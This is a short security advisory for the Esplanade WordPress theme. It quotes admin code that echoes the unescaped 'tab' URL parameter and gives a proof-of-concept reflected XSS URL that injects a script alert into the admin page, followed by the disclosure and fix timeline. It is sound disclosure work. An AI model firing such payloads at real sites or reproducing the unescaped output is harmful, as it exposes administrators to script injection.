$_GET['tab'] is not escaped.
File: esplanade\includes\theme-options.php
function esplanade_theme_page() {
add_theme_page( __( 'Esplanade Theme Options', 'esplanade' ), __( 'Theme Options', 'esplanade' ), 'edit_theme_options', 'esplanade_options', 'esplanade_admin_options_page' );
}
add_action( 'admin_menu', 'esplanade_theme_page' );
function esplanade_admin_options_page() { ?>
<div class="wrap">
<?php esplanade_admin_options_page_tabs(); ?>
<?php if ( isset( $_GET['settings-updated'] ) ) : ?>
<div class='updated'><p><?php _e( 'Theme settings updated successfully.', 'esplanade' ); ?></p></div>
<?php endif; ?>
<form action="options.php" method="post">
<?php settings_fields( 'esplanade_theme_options' ); ?>
<?php do_settings_sections('esplanade_options'); ?>
<p> </p>
<?php $tab = ( isset( $_GET['tab'] ) ? $_GET['tab'] : 'general' ); ?>
<input name="esplanade_theme_options[submit-<?php echo $tab; ?>]" type="submit" class="button-primary" value="<?php _e( 'Save Settings', 'esplanade' ); ?>" />
<input name="esplanade_theme_options[reset-<?php echo $tab; ?>]" type="submit" class="button-secondary" value="<?php _e( 'Reset Defaults', 'esplanade' ); ?>" />
<script>
jQuery(document).ready(function($) {
$('.wp-color-picker').wpColorPicker();
});
</script>
</form>
</div>
<?php}
Proof of Concept
XSS will be visible for admin.
http://wordpress-url/wp-admin/themes.php?page=esplanade_options&tab="/><script>alert(String.fromCharCode(88,83,83));</script>Timeline
- 16-01-2015: Discovered
- 16-01-2015: Vendor notified
- 17-01-2015: Version 1.1.5 released, issue resolved
